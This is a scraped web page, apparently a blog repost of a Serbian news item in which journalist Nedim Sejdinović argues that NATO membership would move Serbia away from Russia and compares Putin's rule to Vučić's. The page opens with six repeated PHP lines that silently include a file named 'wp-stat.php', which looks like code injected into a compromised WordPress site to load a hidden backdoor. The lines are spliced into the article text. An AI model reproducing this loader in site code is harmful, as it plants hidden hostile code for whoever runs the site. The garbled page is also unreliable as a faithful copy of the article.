@require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); Sejdinović: Ulazak u NATO značio bi otklon od Rusije – neprijatelja Srbije – Nedim Sejdinović

Sejdinović: Ulazak u NATO značio bi otklon od Rusije – neprijatelja Srbije

Predsednik Nezavisnog društva novinara Vojvodine Nedim Sejdinović izjavio je da bi za Srbiju bilo dobro da uđe u NATO pakt, jer bi to značilo “otklon od Rusije, koja joj je zapravo neprijatelj”.

“Bez obzira što sam pacifista, mislim da bi sa real-političke tačke gledišta ulazak u NATO bio pozitivan za Srbiju zbog unutrašnjih prilika i jačanja demokratskih procesa, a ono što je jako važno, značio bi i otklon od Rusije, koja je Srbiji dugo godina zapravo jedan veliki neprijatelj”, kazao je Sejdinović u internet izdanju emisije “Lični stav”.

Kako je Sejdinović objasnio, model vladavine stranke Putina i njegove Jedinstvene Rusije interesantan je i zbog poređenja sa drugim zemljama, jer izgleda kao da ga neko “prodaje kao franšizu”.

Prema njegovim rečima, Jedinstvena Rusija nosi kombinaciju nacionalizma, koji je nekada povezan sa religijom, a nekada ne, i biznisa, krupnog kapitala i korupcije, uz pomoću kojih uspešno vlada.

“Ta vladavina prati i žestoki obračun sa opozicijom i bilo kakvim alternativama. Ali ono što plaši jeste da taj način vladavine nije slučajan, jer imamo primere Erdogana u Turskoj, Orbana u Mađarskoj, primer Makedonije, koji su veoma slični i ovome što imamo u Srbiji”, rekao je Sejdinović.

On je dodao da u Srbiji vladajuća Srpska napredna stranka i Aleksandar Vučić svoje političke poteze i popularnost proveravaju kod ciljne grupe koja je neobrazovana ili slabo obrazovana, i iz nižih socijalnih grupa, na isti način kako to radi i Putin u Rusiji.

“Ovi primeri otvaraju jedno mnogo ozbiljnije pitanje, a to su zapravo dometi demokratskog sistema, ne samo kod nas već i u celom svetu”, objasnio je Sejdinović.

Ekisija “Lični stav” emituje se na istoimenom Jutjub (YouTube) kanalu.

(Autonomija)

Sviđa vam se ovaj tekst? Odojite sekund vašeg vremena da podržite Nedima Sejdinovića preko Patreon-a!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.